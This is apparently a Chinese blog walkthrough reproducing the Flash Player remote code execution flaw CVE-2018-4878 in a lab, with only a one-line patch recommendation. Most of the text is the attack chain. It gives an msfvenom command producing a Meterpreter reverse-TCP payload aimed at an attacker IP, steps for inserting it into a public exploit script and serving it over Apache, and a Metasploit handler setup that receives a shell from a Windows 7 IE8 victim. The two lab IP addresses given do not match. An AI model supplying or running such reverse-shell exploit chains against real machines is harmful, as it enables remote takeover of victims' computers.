Flash漏洞(CVE-2018-4878 )复现

简介

攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。

影响版本

Flash Player28.0.0.137及以前的所有版本

漏洞复现

使用msfvenom生成shell代码

生成代码,其中lhost为kali的ip地址,lport为自定义的端口号

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=6666  -f  python>shellcode.txt 

Flash漏洞(CVE-2018-4878 )复现_第1张图片

查看生成的文件cat shellcode.txt

Flash漏洞(CVE-2018-4878 )复现_第2张图片

进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件

将上面msfvenom生成的代码覆盖掉原来的代码:

Flash漏洞(CVE-2018-4878 )复现_第3张图片

修改CVE-2018-4878.py下面的文件信息

Flash漏洞(CVE-2018-4878 )复现_第4张图片

进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878-master.py代码

python cve-2018-4878.py

Flash漏洞(CVE-2018-4878 )复现_第5张图片

Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(apache web路径)

service apache2 start

Flash漏洞(CVE-2018-4878 )复现_第6张图片

此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。

设置相关配置等待即可

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.220.137

set lport 6666

exploit

Flash漏洞(CVE-2018-4878 )复现_第7张图片

安装flash插件,并用IE浏览器访问页面

Flash漏洞(CVE-2018-4878 )复现_第8张图片

安装flash插件

使用Win7内置IE 8浏览器访问页面 192.168.220.137/index2.html

Flash漏洞(CVE-2018-4878 )复现_第9张图片

返回shell

Flash漏洞(CVE-2018-4878 )复现_第10张图片

Flash漏洞(CVE-2018-4878 )复现_第11张图片

修复建议

升级Flash到最新版

你可能感兴趣的:(安全)